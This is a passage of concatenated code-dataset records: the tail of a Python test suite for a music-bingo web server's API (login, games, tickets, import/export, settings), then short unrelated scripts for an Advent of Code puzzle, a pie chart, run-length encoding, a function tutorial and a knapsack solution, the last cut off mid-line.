self.assertTrue(user.check_password('mysecret'))\n self.assertIsNone(user.reset_expires)\n self.assertIsNone(user.reset_token)\n\nclass TestListGamesApi(ServerBaseTestCase):\n \"\"\"\n Test game list server APIs\n \"\"\"\n def setUp(self):\n super().setUp()\n json_filename = fixture_filename(\"tv-themes-v4.json\")\n with models.db.session_scope() as dbs:\n imp = Importer(self.options(), dbs, Progress())\n imp.import_database(json_filename)\n\n @freeze(\"2020-04-24 03:04:05\")\n def test_game_list(self, frozen_time):\n \"\"\"\n Test get list of past and present games\n \"\"\"\n with self.client:\n response = self.login_user('user', 'mysecret')\n self.assert200(response)\n self.assertNoCache(response)\n access_token = response.json['accessToken']\n expected = {\n \"games\": [\n {\n \"pk\": 1,\n \"id\": \"20-04-24-2\",\n \"title\": \"TV Themes\",\n \"start\": \"2020-04-24T18:05:44.048300Z\",\n \"end\": \"2020-08-02T18:05:44.048300Z\",\n \"options\": {\n 'cards_per_page': 3,\n 'checkbox': False,\n 'colour_scheme': 'blue',\n 'number_of_cards': 24,\n 'include_artist': True,\n 'columns': 5,\n 'rows': 3,\n 'page_size': 'A4',\n 'sort_order': 'interleave',\n 'backgrounds': [\n '#daedff', '#f0f8ff', '#daedff', '#f0f8ff', '#daedff',\n '#f0f8ff', '#daedff', '#f0f8ff', '#daedff', '#f0f8ff',\n '#daedff', '#f0f8ff', '#daedff', '#f0f8ff', '#daedff'\n ]\n },\n \"userCount\": 0\n }\n ],\n \"past\": []\n }\n with self.client:\n response = self.client.get(\n '/api/games',\n headers={\n \"Authorization\": f'Bearer {access_token}',\n }\n )\n self.assert200(response)\n self.assertNoCache(response)\n self.maxDiff = None # pylint: disable=attribute-defined-outside-init\n self.assertDictEqual(response.json, expected)\n frozen_time.move_to(datetime(year=2020, month=8, day=3))\n expected[\"past\"] = expected[\"games\"]\n expected[\"games\"] = []\n # login required as both access token and refresh token will have expired\n with self.client:\n response = self.login_user('user', 'mysecret')\n self.assert200(response)\n self.assertNoCache(response)\n access_token = response.json['accessToken']\n with self.client:\n response = self.client.get(\n '/api/games',\n headers={\n \"Authorization\": f'Bearer {access_token}',\n }\n )\n self.assert200(response)\n self.assertNoCache(response)\n self.maxDiff = None # pylint: disable=attribute-defined-outside-init\n self.assertDictEqual(response.json, expected)\n\n\nclass TestQuerySongsApi(ServerBaseTestCase, ModelsUnitTest):\n \"\"\"\n Test song list and query API\n \"\"\"\n def setUp(self):\n sql_filename = fixture_filename(\"tv-themes-v5.sql\")\n engine = create_engine(self.options().database.connection_string())\n self.load_fixture(engine, sql_filename)\n DatabaseConnection.bind(self.options().database, create_tables=False,\n engine=engine)\n\n def test_song_query(self):\n \"\"\"\n Test get list of matching songs\n \"\"\"\n with self.client:\n response = self.login_user('user', 'mysecret')\n self.assert200(response)\n self.assertNoCache(response)\n access_token = response.json['accessToken']\n expected = [{\n 'pk': 1,\n 'filename': '01-25- Ghostbusters.mp3',\n 'title': 'Ghostbusters',\n 'duration': 30016,\n 'channels': 2,\n 'sample_rate': 44100,\n 'sample_width': 16,\n 'bitrate': 256,\n 'uuid': 'urn:uuid:7dcc81f2-5dbe-5973-9556-494d94cf0f77',\n 'directory': 1,\n 'artist': 'Ray Parker Jr',\n 'album': '100 Hits 80s Essentials'\n }, {\n 'pk': 24,\n 'filename': '18 Blockbusters.mp3',\n 'title': 'Blockbusters',\n 'duration': 30016,\n 'channels': 2,\n 'sample_rate': 44100,\n 
'sample_width': 16,\n 'bitrate': 256,\n 'uuid': 'urn:uuid:ba5a0f66-e319-5dd3-ab3e-00f0ccd61cc8',\n 'directory': 1,\n 'artist': 'Gordon Lorenz Orchestra',\n 'album': 'Your 101 All Time Favourite TV Themes'\n }]\n with self.client:\n response = self.client.get(\n '/api/song?q=bus',\n headers={\n \"Authorization\": f'Bearer {access_token}',\n }\n )\n self.assert200(response)\n self.assertNoCache(response)\n # self.maxDiff = None\n self.assertListEqual(response.json, expected)\n expected = [{\n 'pk': 14,\n 'filename': '10 The Six Million Dollar Man.mp3',\n 'title': 'The Six Million Dollar Man',\n 'duration': 30016,\n 'channels': 2,\n 'sample_rate': 44100,\n 'sample_width': 16,\n 'bitrate': 256,\n 'uuid': 'urn:uuid:2b566ec7-f11b-5d96-82ad-f1bc6cb9b485',\n 'directory': 1,\n 'artist': 'Dusty Springfield',\n 'album': 'All-Time Top 100 TV Themes [Disc 2]'\n }]\n with self.client:\n response = self.client.get(\n '/api/song?q=spring',\n headers={\n \"Authorization\": f'Bearer {access_token}',\n }\n )\n self.assert200(response)\n self.assertNoCache(response)\n self.assertListEqual(response.json, expected)\n\n\nclass TestDownloadTicketView(ServerBaseTestCase, ModelsUnitTest):\n \"\"\"\n Test downloading PDF of a ticket\n \"\"\"\n def setUp(self):\n sql_filename = fixture_filename(\"tv-themes-v5.sql\")\n engine = create_engine(self.options().database.connection_string())\n self.load_fixture(engine, sql_filename)\n DatabaseConnection.bind(self.options().database, create_tables=False,\n engine=engine)\n\n def test_download_claimed_ticket(self):\n \"\"\"\n Test get a PDF of a ticket that has been claimed by the user\n \"\"\"\n with self.client:\n response = self.login_user('user', 'mysecret')\n self.assert200(response)\n self.assertNoCache(response)\n access_token = response.json['accessToken']\n # assign ticket 23 to this user\n with models.db.session_scope() as dbs:\n game = models.Game.get(dbs, id='20-04-24-2')\n self.assertIsNotNone(game)\n game_pk = game.pk\n ticket = models.BingoTicket.get(dbs, game=game, number=23)\n ticket_pk = ticket.pk\n self.assertIsNotNone(ticket)\n user = models.User.get(dbs, username='user')\n self.assertIsNotNone(user)\n ticket.user = user\n dbs.flush()\n with self.client:\n response = self.client.get(\n f'/api/game/{game_pk}/ticket/ticket-{ticket_pk}.pdf',\n headers={\n \"Authorization\": f'Bearer {access_token}',\n }\n )\n self.assert200(response)\n self.assertNoCache(response)\n self.assertEqual(response.headers['Content-Type'], 'application/pdf')\n self.assertEqual(response.headers['Content-Disposition'],\n 'attachment; filename=\"Game 20-04-24-2 ticket 23.pdf\"')\n\n def test_download_unclaimed_ticket(self):\n \"\"\"\n Test that trying to get a PDF of a ticket that has not been claimed by the user\n fails.\n \"\"\"\n with self.client:\n response = self.login_user('user', 'mysecret')\n self.assert200(response)\n self.assertNoCache(response)\n access_token = response.json['accessToken']\n with self.client:\n response = self.client.get(\n '/api/game/1/ticket/ticket-21.pdf',\n headers={\n \"Authorization\": f'Bearer {access_token}',\n }\n )\n self.assert401(response)\n\n def test_host_download_ticket(self):\n \"\"\"\n Test that a host can download any ticket\n \"\"\"\n with self.client:\n response = self.login_user('user', 'mysecret')\n self.assert200(response)\n self.assertNoCache(response)\n access_token = response.json['accessToken']\n with models.db.session_scope() as dbs:\n user = models.User.get(dbs, username='user')\n self.assertIsNotNone(user)\n 
user.set_groups(['users', 'hosts'])\n with self.client:\n response = self.client.get(\n '/api/game/1/ticket/ticket-21.pdf',\n headers={\n \"Authorization\": f'Bearer {access_token}',\n }\n )\n self.assert200(response)\n self.assertNoCache(response)\n self.assertEqual(response.headers['Content-Type'], 'application/pdf')\n self.assertEqual(response.headers['Content-Disposition'],\n 'attachment; filename=\"Game 20-04-24-2 ticket 23.pdf\"')\n\n\nclass ServerTestCaseBase(LiveServerTestCase, ModelsUnitTest):\n \"\"\"\n Base class for test cases that need to use a live HTTP server\n \"\"\"\n LIVESERVER_TIMEOUT: int = 15\n FIXTURE: Optional[str] = \"tv-themes-v5.sql\"\n\n _temp_dir = multiprocessing.Array(ctypes.c_char, 1024)\n\n def create_app(self):\n log_format = \"%(thread)d %(filename)s:%(lineno)d %(message)s\"\n logging.basicConfig(format=log_format)\n # logging.getLogger().setLevel(logging.DEBUG)\n # logging.getLogger(models.db.__name__).setLevel(logging.DEBUG)\n tempdir = tempfile.mkdtemp()\n self._temp_dir.value = bytes(tempdir, 'utf-8')\n options = Options(database_provider='sqlite',\n database_name=f'{tempdir}/bingo.db3',\n debug=False,\n smtp_server='unit.test',\n smtp_sender='sender@unit.test',\n smtp_reply_to='reply_to@unit.test',\n smtp_username='email',\n smtp_password='secret',\n smtp_starttls=False)\n engine = create_engine(options.database.connection_string())\n if self.FIXTURE is not None:\n self.load_fixture(engine, self.FIXTURE)\n #json_filename = fixture_filename(self.FIXTURE)\n #with models.db.session_scope() as dbs:\n # imp = Importer(options, dbs, Progress())\n # imp.import_database(json_filename)\n DatabaseConnection.bind(options.database, create_tables=False,\n engine=engine)\n fixtures = Path(__file__).parent / \"fixtures\"\n return create_app(AppConfig, options, static_folder=fixtures,\n template_folder=fixtures)\n\n def setUp(self):\n self.session = requests.Session()\n\n def tearDown(self):\n self.session.close()\n self._terminate_live_server()\n DatabaseConnection.close()\n if self._temp_dir.value:\n shutil.rmtree(self._temp_dir.value)\n\n def login_user(self, username, password, rememberme=False):\n \"\"\"\n Call login REST API\n \"\"\"\n api_url = self.get_server_url()\n return self.session.post(\n f'{api_url}/api/user',\n data=json.dumps({\n 'username': username,\n 'password': password,\n 'rememberme': rememberme\n }),\n headers={\n \"content-type\": 'application/json',\n }\n )\n\nclass TestImportGame(ServerTestCaseBase):\n \"\"\"\n Test importing games into database\n \"\"\"\n def test_import_not_admin(self):\n \"\"\"\n Test import of gameTracks file when not an admin\n \"\"\"\n response = self.login_user('user', 'mysecret')\n self.assert200(response)\n self.assertNoCache(response)\n access_token = response.json()['accessToken']\n json_filename = fixture_filename(\"gameTracks-v3.json\")\n with json_filename.open('rt', encoding='utf-8') as src:\n data = json.load(src)\n api_url = self.get_server_url()\n response = self.session.put(\n f'{api_url}/api/games',\n json={\n \"filename\": \"game-20-01-02-1.json\",\n \"data\": data\n },\n headers={\n \"Authorization\": f'Bearer {access_token}',\n \"content-type\": 'application/json',\n }\n )\n self.assertEqual(response.status_code, 401)\n self.assertNoCache(response)\n # force reading of data from server\n response.raw.read()\n\n def test_import_v3_game(self):\n \"\"\"\n Test import of a v3 gameTracks file\n \"\"\"\n response = self.login_user('admin', 'adm!n')\n self.assert200(response)\n self.assertNoCache(response)\n 
access_token = response.json()['accessToken']\n json_filename = fixture_filename(\"gameTracks-v3.json\")\n with json_filename.open('rt', encoding='utf-8') as src:\n data = json.load(src)\n api_url = self.get_server_url()\n response = self.session.put(\n f'{api_url}/api/games',\n json={\n \"filename\": \"game-20-01-02-1.json\",\n \"data\": data\n },\n headers={\n \"Authorization\": f'Bearer {access_token}',\n \"Accept\": 'application/json',\n \"content-type\": 'application/json',\n },\n stream=True\n )\n self.assert200(response)\n self.assertNoCache(response)\n content_type = response.headers['Content-Type']\n self.assertTrue(content_type.startswith('multipart/'))\n pos = content_type.index('; boundary=')\n boundary = content_type[pos + len('; boundary='):]\n parser = MultipartMixedParser(bytes(boundary, 'utf-8'), response)\n for part in parser.parse():\n data = json.loads(part)\n if data['done']:\n expected = {\n 'done': True,\n 'errors': [],\n 'success': True,\n 'added': {\n \"User\": 0,\n \"Directory\": 2,\n \"Album\": 1,\n \"Artist\": 34,\n \"Song\": 40,\n \"Track\": 40,\n \"BingoTicket\": 24,\n \"Game\": 1\n },\n 'keys': data['keys'],\n 'text': 'Import complete',\n 'pct': 100.0,\n 'phase': 7,\n 'numPhases': 8,\n }\n # print(data)\n # print(expected)\n self.assertDictEqual(data, expected)\n\n def test_import_not_gametracks_file(self):\n \"\"\"\n Test import of a JSON file that is not a gameTracks file\n \"\"\"\n response = self.login_user('admin', 'adm!n')\n self.assert200(response)\n self.assertNoCache(response)\n access_token = response.json()['accessToken']\n json_filename = fixture_filename(\"tv-themes-v4.json\")\n with json_filename.open('rt', encoding='utf-8') as src:\n data = json.load(src)\n api_url = self.get_server_url()\n response = self.session.put(\n f'{api_url}/api/games',\n json={\n \"filename\": \"game-20-01-02-1.json\",\n \"data\": data\n },\n headers={\n \"Authorization\": f'Bearer {access_token}',\n \"Accept\": 'application/json',\n \"content-type\": 'application/json',\n },\n stream=True\n )\n self.assert200(response)\n self.assertNoCache(response)\n content_type = response.headers['Content-Type']\n self.assertTrue(content_type.startswith('multipart/'))\n pos = content_type.index('; boundary=')\n boundary = content_type[pos + len('; boundary='):]\n parser = MultipartMixedParser(bytes(boundary, 'utf-8'), response)\n expected = {\n 'errors': [\n 'Not a valid gameTracks file',\n 'data must be valid exactly by one of oneOf definition'\n ],\n 'text': '',\n 'pct': 100.0,\n 'phase': 1,\n 'numPhases': 1,\n 'done': True,\n 'success': False\n }\n for part in parser.parse():\n data = json.loads(part)\n if data['done']:\n # self.maxDiff = None\n self.assertIn('errors', data)\n self.assertEqual(data['errors'][0], expected['errors'][0])\n # avoid making assumptions about the exact text output from the\n # fastjson library\n expected['errors'] = data['errors']\n self.assertDictEqual(expected, data)\n\nclass TestImportDatabase(ServerTestCaseBase):\n \"\"\"\n Test importing database\n \"\"\"\n FIXTURE: Optional[str] = None\n\n def create_app(self):\n app = super().create_app()\n with models.db.session_scope() as dbs:\n admin = User(username=\"admin\",\n password=\"$2b$12$H8xhXO1D1t74YL2Ya2s6O.Kw7jGvWQjKci1y4E7L8ZAgrFE2EAanW\",\n email=\"admin@music.bingo\",\n groups_mask=1073741825)\n dbs.add(admin)\n user = User(username=\"user\",\n password=\"$2b$12$CMqbfc75fgPwQYfAsUvqo.x/G7/5uqTAiKKU6/R/MS.6sfyXHmcI2\",\n email=\"user@unit.test\",\n groups_mask=1)\n dbs.add(user)\n return app\n\n 
def test_import_not_admin(self):\n \"\"\"\n Test import of database file when not an admin\n \"\"\"\n response = self.login_user('user', 'mysecret')\n self.assert200(response)\n self.assertNoCache(response)\n access_token = response.json()['accessToken']\n json_filename = fixture_filename(\"tv-themes-v4.json\")\n with json_filename.open('rt', encoding='utf-8') as src:\n data = json.load(src)\n api_url = self.get_server_url()\n response = self.session.put(\n f'{api_url}/api/database',\n json={\n \"filename\": \"tv-themes-v4.json\",\n \"data\": data\n },\n headers={\n \"Authorization\": f'Bearer {access_token}',\n \"content-type\": 'application/json',\n }\n )\n self.assertEqual(response.status_code, 401)\n self.assertNoCache(response)\n # force reading of data from server\n response.raw.read()\n\n def test_import_v4_database(self):\n \"\"\"\n Test import of a v4 database file\n \"\"\"\n response = self.login_user('admin', 'adm!n')\n self.assert200(response)\n self.assertNoCache(response)\n access_token = response.json()['accessToken']\n json_filename = fixture_filename(\"tv-themes-v4.json\")\n with json_filename.open('rt', encoding='utf-8') as src:\n data = json.load(src)\n api_url = self.get_server_url()\n response = self.session.put(\n f'{api_url}/api/database',\n json={\n \"filename\": \"tv-themes-v4.json\",\n \"data\": data\n },\n headers={\n \"Authorization\": f'Bearer {access_token}',\n \"Accept\": 'application/json',\n \"content-type\": 'application/json',\n },\n stream=True\n )\n self.assert200(response)\n self.assertNoCache(response)\n content_type = response.headers['Content-Type']\n self.assertTrue(content_type.startswith('multipart/'))\n pos = content_type.index('; boundary=')\n boundary = content_type[pos + len('; boundary='):]\n parser = MultipartMixedParser(bytes(boundary, 'utf-8'), response)\n for part in parser.parse():\n data = json.loads(part)\n if data['done']:\n self.assertListEqual(data['errors'], [])\n self.assertEqual(data['success'], True)\n added = {\n \"User\": 0,\n \"Directory\": 1,\n \"Album\": 5,\n \"Artist\": 9,\n \"Song\": 71,\n \"Track\": 50,\n \"BingoTicket\": 24,\n \"Game\": 1\n }\n self.assertDictEqual(added, data['added'])\n\nclass TestExportDatabase(ServerTestCaseBase):\n \"\"\"\n Test exporting database\n \"\"\"\n def test_export_v5_database(self) -> None:\n \"\"\"\n Test export of a v5 database file\n \"\"\"\n response = self.login_user('admin', 'adm!n')\n self.assert200(response)\n self.assertNoCache(response)\n access_token = response.json()['accessToken']\n api_url = self.get_server_url()\n response = self.session.get(\n f'{api_url}/api/database',\n headers={\n \"Authorization\": f'Bearer {access_token}',\n \"Accept\": 'application/json',\n }\n )\n self.assert200(response)\n self.assertNoCache(response)\n content_type = response.headers['Content-Type']\n self.assertTrue(content_type.startswith('application/json'))\n try:\n data : JsonObject = response.json()\n except json.decoder.JSONDecodeError:\n print(response.data)\n raise\n #with open(\"exported-tv-themes-v5.json\", 'wt') as dst:\n # json.dump(data, dst, indent=' ', default=utils.flatten)\n json_filename = fixture_filename(\"exported-tv-themes-v5.json\")\n with json_filename.open('rt', encoding='utf-8') as src:\n expected = json.load(src)\n admin: Optional[JsonObject] = None\n for user in cast(List[JsonObject], data['Users']):\n if user['username'] == 'admin':\n admin = user\n break\n self.assertIsNotNone(admin)\n for user in cast(List[JsonObject], expected['Users']):\n if user['username'] == 
'admin':\n user['last_login'] = cast(JsonObject, admin)['last_login']\n # self.maxDiff = None\n for table in ['Users', 'Artists', 'Directories', 'Songs',\n 'Games', 'Tracks', 'BingoTickets']:\n items = {}\n for item in data[table]:\n items[item['pk']] = item\n actual = []\n for item in expected[table]:\n actual.append(items[item['pk']])\n self.assertModelListEqual(actual, expected[table], table)\n\nclass TestSettingsApi(ServerBaseTestCase):\n \"\"\"\n Test settings server APIs\n \"\"\"\n def setUp(self) -> None:\n super().setUp()\n json_filename = fixture_filename(\"tv-themes-v4.json\")\n with models.db.session_scope() as dbs:\n imp = Importer(self.options(), dbs, Progress())\n imp.import_database(json_filename)\n\n def test_translate_options(self) -> None:\n \"\"\"\n Test translating options to JSON\n \"\"\"\n class TestOptions(DatabaseOptions):\n \"\"\"\"\n Version of DatabaseOptions that doesn't try to load environment variables\n \"\"\"\n def load_environment_settings(self) -> None:\n \"\"\"\n Check environment for database settings\n \"\"\"\n return\n\n db_opts = TestOptions(database_name=\"bingo.db3\", database_provider=\"sqlite\")\n expected: List[JsonObject] = [{\n \"help\": \"Timeout (in seconds) when connecting to database\",\n \"name\": \"connect_timeout\",\n \"title\": \"Connect Timeout\",\n \"value\": None,\n \"type\": \"int\",\n \"minValue\": 1,\n \"maxValue\": 3600\n }, {\n \"help\": \"Create database if not found (sqlite only)\",\n \"name\": \"create_db\",\n \"title\": \"Create Db\",\n \"value\": True,\n \"type\": \"bool\"\n }, {\n \"help\": \"Database driver\",\n \"name\": \"driver\",\n \"title\": \"Driver\",\n \"value\": None,\n \"type\": \"text\"\n }, {\n \"help\": \"Database name (or filename for sqlite)\",\n \"name\": \"name\",\n \"title\": \"Name\",\n \"value\": \"bingo.db3\",\n \"type\": \"text\"\n }, {\n \"help\": \"Hostname of database server\",\n \"name\": \"host\",\n \"title\": \"Host\",\n \"value\": None,\n \"type\": \"text\"\n }, {\n \"help\": \"Password for connecting to database\",\n \"name\": \"passwd\",\n \"title\": \"Passwd\",\n \"value\": None,\n \"type\": \"text\"\n }, {\n \"help\": \"Port to use to connect to database\",\n \"name\": \"port\",\n \"title\": \"Port\",\n \"value\": None,\n \"type\": \"int\",\n \"minValue\": 1,\n \"maxValue\": 65535\n }, {\n \"help\": \"Database provider (sqlite, mysql) [%(default)s]\",\n \"name\": \"provider\",\n \"title\": \"Provider\",\n \"value\": \"sqlite\",\n \"type\": \"text\"\n }, {\n \"help\": \"TLS options\",\n \"name\": \"ssl\",\n \"title\": \"Ssl\",\n \"value\": None,\n \"type\": \"json\"\n }, {\n \"help\": \"Username for connecting to database\",\n \"name\": \"user\",\n \"title\": \"User\",\n \"value\": None,\n \"type\": \"text\"\n }]\n actual = SettingsApi.translate_options(db_opts)\n self.assertListEqual(expected, actual)\n\n def test_get_settings(self) -> None:\n \"\"\"\n Test get current settings\n \"\"\"\n opts = self.options()\n # check request without bearer token only returns privacy policy\n with self.client:\n response = self.client.get('/api/settings')\n self.assert200(response)\n self.assertNoCache(response)\n expected = {\n 'privacy': SettingsApi.translate_options(opts.privacy),\n }\n self.assertDictEqual(response.json, expected)\n # check request for non-admin user\n with self.client:\n response = self.login_user('user', 'mysecret')\n self.assert200(response)\n self.assertNoCache(response)\n data = response.json\n self.assertIn('accessToken', data)\n access_token = data['accessToken']\n response = 
self.client.get('/api/settings')\n self.assert200(response)\n self.assertNoCache(response)\n expected = {\n 'privacy': SettingsApi.translate_options(opts.privacy),\n }\n self.assertDictEqual(response.json, expected)\n self.logout_user(access_token)\n with self.client:\n response = self.login_user('admin', 'adm!n')\n self.assert200(response)\n self.assertNoCache(response)\n access_token = response.json['accessToken']\n expected = {\n 'app': SettingsApi.translate_options(opts),\n }\n for ext_cls in opts.EXTRA_OPTIONS:\n ext_opts = cast(ExtraOptions,\n getattr(opts, ext_cls.LONG_PREFIX))\n expected[ext_cls.LONG_PREFIX] = SettingsApi.translate_options(ext_opts)\n with self.client:\n response = self.client.get(\n '/api/settings',\n headers={\n \"Authorization\": f'Bearer {access_token}',\n }\n )\n self.assert200(response)\n self.assertNoCache(response)\n self.maxDiff = None # pylint: disable=attribute-defined-outside-init\n self.assertDictEqual(response.json, expected)\n\n def test_modify_settings(self) -> None:\n \"\"\"\n Test modify current settings\n \"\"\"\n before = self.options().to_dict()\n changes: JsonObject = {\n 'app': {\n 'bitrate': 128,\n 'colour_scheme': 'PRIDE',\n 'doc_per_page': True,\n 'game_name_template': 'bingo-{game_id}.json',\n 'max_tickets_per_user': 4,\n },\n 'smtp': {\n 'port': 123,\n },\n 'database': {\n 'driver': 'dbDriver',\n },\n 'privacy': {\n 'ico': 'https://ico.url',\n },\n }\n # check request without bearer token is rejected\n with self.client:\n response = self.client.post(\n '/api/settings',\n data=json.dumps(changes),\n content_type='application/json',\n )\n self.assert401(response)\n self.assertNoCache(response)\n with self.client:\n response = self.login_user('user', 'mysecret')\n self.assert200(response)\n self.assertNoCache(response)\n access_token = response.json['accessToken']\n # check request for non-admin user is rejected\n with self.client:\n response = self.client.post(\n '/api/settings',\n data=json.dumps(changes),\n headers={\n \"Authorization\": f'Bearer {access_token}',\n },\n content_type='application/json',\n )\n self.assertEqual(response.status_code, 401)\n self.logout_user(access_token)\n with self.client:\n response = self.login_user('admin', 'adm!n')\n self.assert200(response)\n self.assertNoCache(response)\n access_token = response.json['accessToken']\n # check request for admin user works correctly\n with self.client:\n response = self.client.post(\n '/api/settings',\n data=json.dumps(changes),\n headers={\n \"Authorization\": f'Bearer {access_token}',\n },\n content_type='application/json',\n )\n self.assertEqual(response.status_code, 200)\n expected_response = {\n 'success': True,\n 'changes': [\n 'app.bitrate',\n 'app.colour_scheme',\n 'app.doc_per_page',\n 'app.game_name_template',\n 'app.max_tickets_per_user',\n 'database.driver',\n 'privacy.ico',\n 'smtp.port',\n ]\n }\n self.assertDictEqual(response.json, expected_response)\n opts = self.options().to_dict()\n changes['app']['colour_scheme'] = Palette.from_string(changes['app']['colour_scheme'])\n for name, value in changes['app'].items():\n self.assertEqual(opts[name], value)\n self.maxDiff = None # pylint: disable=attribute-defined-outside-init\n for name, value in before.items():\n if name in changes['app']:\n continue\n if name in Options.EXTRA_OPTIONS_NAMES:\n continue\n self.assertEqual(value, opts[name])\n for section in Options.EXTRA_OPTIONS_NAMES:\n for name, value in changes[section].items():\n self.assertEqual(opts[section][name], value)\n for name, value in 
before[section].items():\n if name in changes[section]:\n continue\n self.assertEqual(value, opts[section][name])\n\nclass TestCssApi(ServerBaseTestCase):\n \"\"\"\n Test CSS API\n \"\"\"\n def test_get_themes_css(self) -> None:\n \"\"\"\n Test getting the themes.css file and that it matches Palette\n \"\"\"\n with self.client:\n response = self.client.get('/api/css/themes.css')\n self.assert200(response)\n charset_re = re.compile(r'charset=([^ ;$]+)')\n match = charset_re.search(response.headers['Content-Type'])\n self.assertIsNotNone(match)\n assert match is not None # tells mypy that value cannot be None\n rules, _ = tinycss2.parse_stylesheet_bytes(\n css_bytes=response.get_data(),\n protocol_encoding=match.group(1))\n found: Set[str] = set()\n for rule in rules:\n if rule.type == 'whitespace':\n continue\n for item in rule.prelude:\n if not isinstance(item, tinycss2.ast.IdentToken):\n continue\n if not item.value.endswith(r'-theme'):\n continue\n theme = item.value[:-len(r'-theme')].upper()\n self.assertIn(theme, Palette.names())\n # TODO: add check that RGB values match entries in Palette\n found.add(theme)\n for name in Palette.names():\n self.assertIn(name, found, f'Missing style entry for {name}')\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"asrashley/music-bingo","sub_path":"musicbingo/tests/test_server_api.py","file_name":"test_server_api.py","file_ext":"py","file_size_in_byte":58420,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"28913371935","text":"from copy import deepcopy\nfrom typing import List, Tuple, Dict\n\nfrom day_9 import solution as int_code\n\n\ndef get_tiles(outputs: List[int]) -> List[List[int]]:\n return [[outputs[i], outputs[i + 1], outputs[i + 2]] for i in range(len(outputs))[::3]]\n\n\ndef get_quantity_of_blocks(tiles: List[List[int]]) -> int:\n return [tile[2] for tile in tiles].count(2)\n\n\ndef get_ball_direction(ball_positions: List[Tuple[int, int]]) -> int:\n return ball_positions[-1][1] - ball_positions[-2][1]\n\n\ndef update_positions(positions: Dict[int, Tuple[int, int]], tiles: List[List[int]]):\n for tile in tiles:\n if tile[2] in (3, 4):\n positions[tile[2]] = (tile[0], tile[1])\n\n\ndef get_next_joystick_position(positions: Dict[int, Tuple[int, int]],\n state: Tuple[int, int, List[int], List[int], List[int], bool]) -> int:\n ball_position = positions.get(4)\n\n while ball_position[1] < 21 and state[5]:\n state = int_code.run_program(state[0], state[1], state[2], [0])\n tiles = get_tiles(state[4])\n update_positions(positions, tiles)\n ball_position = positions.get(4)\n\n return ball_position[0]\n\n\ndef run_game(integers: List[int], tiles: List[List[int]]) -> int:\n positions = dict()\n update_positions(positions, tiles)\n\n ball_positions = [positions.get(4)]\n joystick_position = positions.get(3)[0]\n next_joystick_position = joystick_position\n\n integers[0] = 2\n state = (0, 0, integers, [0], [], True)\n\n while state[5]:\n state = int_code.run_program(state[0], state[1], state[2], state[3])\n tiles = get_tiles(state[4])\n update_positions(positions, tiles)\n\n joystick_position = positions.get(3)[0]\n ball_position = positions.get(4)\n ball_positions.append(ball_position)\n ball_direction = get_ball_direction(ball_positions)\n\n if ball_position[1] == 20 and ball_direction == -1:\n next_joystick_position = get_next_joystick_position(deepcopy(positions), deepcopy(state))\n\n state[3].append((next_joystick_position > joystick_position) - (joystick_position > 
next_joystick_position))\n\n    return next(tile[2] for tile in tiles if tile[0] == -1 and tile[1] == 0)\n\n\ndef part_1(filename: str) -> int:\n    with open(filename) as file:\n        integers = [int(i) for i in file.read().split(',')]\n    outputs = int_code.run_program(0, 0, integers, [])[4]\n    tiles = get_tiles(outputs)\n    return get_quantity_of_blocks(tiles)\n\n\ndef part_2(filename: str) -> int:\n    with open(filename) as file:\n        integers = [int(i) for i in file.read().split(',')]\n    outputs = int_code.run_program(0, 0, integers, [])[4]\n    tiles = get_tiles(outputs)\n    return run_game(integers.copy(), tiles.copy())\n\n\nprint(f\"Day 13 (Part 1) - Answer: {part_1('input.txt')}\")\nprint(f\"Day 13 (Part 2) - Answer: {part_2('input.txt')}\")\n","repo_name":"DavidMendozaMartinez/Advent-of-Code-2019","sub_path":"day_13/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":2880,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"}
{"seq_id":"7452140513","text":"import matplotlib.pyplot as plt \nSPORTS = ['FOOTBALL', 'CRICKET', 'BADMINTON', 'BASKETBALL'] \nslices = [7, 6, 5, 3] \ncolors = ['y', 'r', 'g', 'b'] \nplt.pie(slices, labels = SPORTS, colors=colors, \n        startangle=90, shadow = True, explode = (0, 0, 0.1, 0), \n        radius = 1.2, autopct = '%1.1f%%') \n \nplt.legend() \n \n\nplt.show() ","repo_name":"kshitizpathak2000/python_collegelabop","sub_path":"graph4b.py","file_name":"graph4b.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"32483031677","text":"from itertools import groupby\n\n\ndef decode(string):\n    number = ''\n    str_decoded = ''\n    for char in string:\n        if char.isdigit():\n            number += char\n        else:\n            if number:\n                str_decoded += char * int(number)\n                number = ''\n            else:\n                str_decoded += char\n\n    return str_decoded\n\n\ndef encode(string):\n    str_encoded = ''\n    my_list = [list(g) for k, g in groupby(string)]\n    for group in my_list:\n        g = ''.join(group)\n        number = str(g.count(group[0])) if (g.count(group[0]) > 1) else ''\n        str_encoded += number + group[0]\n    return str_encoded\n\n","repo_name":"Riverfount/exercism","sub_path":"python/run-length-encoding/run_length_encoding.py","file_name":"run_length_encoding.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"33485965814","text":"\"\"\"\nFunctions\n    def function_name(parameters):\n        function_body\n        return return_value\n\"\"\"\n\n\n# Function with an attached docstring\ndef add(m, n):\n    \"\"\"\n    Addition operation\n    :param m: any number\n    :param n: any number\n    :return: the sum of the numbers\n    \"\"\"\n    res = m + n\n    return res\n\n\nx = add(2, 4)\nprint(x)\n\n# Modify a global variable inside a function\nnum = 100\n\n\ndef func_a():\n    global num\n    num = 500\n\n\nfunc_a()\nprint(num)  # 500\n","repo_name":"kanzaki-t/python","sub_path":"01_基础/09_函数.py","file_name":"09_函数.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"71364718224","text":"import sys\ninput = sys.stdin.readline\n\nn, t = map(int, input().split())\n\nans = [[0 for _ in range(t+1)] for _ in range(n)]\n\nfor i in range(n):\n    k, s = map(int, input().split())\n    for j in range(1, t + 1):\n        if j >= k:\n            ans[i][j] = max(ans[i - 1][j], ans[i - 1][j - k] + s)\n        else:\n            ans[i][j] = ans[i - 
